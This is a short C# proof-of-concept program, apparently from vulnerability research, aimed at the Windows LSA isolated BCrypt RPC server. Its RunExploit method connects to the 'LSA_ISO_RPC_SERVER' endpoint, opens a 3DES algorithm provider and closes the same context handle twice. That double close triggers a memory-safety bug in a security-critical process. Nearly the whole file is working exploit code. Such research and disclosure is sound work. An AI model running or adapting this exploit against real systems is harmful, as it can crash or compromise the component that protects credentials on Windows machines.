﻿using BCryptRpc;
using NtApiDotNet;
using NtApiDotNet.Ndr.Marshal;
using NtApiDotNet.Utilities.Text;
using System;

namespace poc
{
    internal static class Program
    {
        internal static void CheckResult(this int result)
        {
            if (result < 0)
                throw new NtException((NtStatus)result);
        }

        static Client Connect(out NdrContextHandle handle)
        {
            Client c = new Client();
            c.Connect("LSA_ISO_RPC_SERVER");
            c.BCryptIumGetClientContext(out handle).CheckResult();
            return c;
        }

        internal static string ToHexDump(this byte[] ba)
        {
            HexDumpBuilder builder = new HexDumpBuilder(true, true, true, true, 0);
            builder.Append(ba);
            builder.Complete();
            return builder.ToString();
        }

        static void RunExploit()
        {
            Client c = Connect(out NdrContextHandle handle);
            c.BCryptIumOpenAlgorithmProvider(handle, out long ctx, "3DES", string.Empty, 0).CheckResult();
            Console.WriteLine("Context: {0:X}", ctx);
            c.BCryptIumCloseAlgorithmProvider(handle, ctx, 0).CheckResult();
            c.BCryptIumCloseAlgorithmProvider(handle, ctx, 0).CheckResult();
        }

        static void Main(string[] args)
        {
            try
            {
                RunExploit();
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
